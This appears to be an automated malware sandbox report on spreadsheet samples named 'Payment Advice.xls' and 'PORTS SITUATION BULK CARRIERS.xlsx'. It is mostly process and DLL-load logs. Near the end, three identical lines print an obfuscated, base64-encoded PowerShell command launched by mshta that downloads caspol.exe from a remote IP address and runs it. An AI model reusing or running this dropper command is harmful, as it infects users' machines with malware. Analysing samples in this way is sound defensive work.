Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: ucrtbase.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: samlib.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: cryptsp.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr	Initial sample: OLE zip file path = xl/calcChain.xml
Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr	Initial sample: OLE zip file path = docProps/thumbnail.wmf

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Payment Advice.xls

Static file information: File size 1136128 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.pdb source: powershell.exe, 00000020.00000002.508901590.00000000027C2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.pdbhP source: powershell.exe, 00000004.00000002.458561358.0000000002471000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.pdbhP source: powershell.exe, 00000020.00000002.508901590.00000000027C2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.pdb source: powershell.exe, 00000004.00000002.458561358.0000000002471000.00000004.00000800.00020000.00000000.sdmp

Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr

Initial sample: OLE indicators vbamacros = False

Source: Payment Advice.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

.NET source code contains potential unpacker

Source: 11.2.caspol.exe.370e230.3.raw.unpack, a6RnQjwUyOApqVRoTt.cs

.Net Code: mDY2StBQj7 System.Reflection.Assembly.Load(byte[])

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"	Jump to behavior
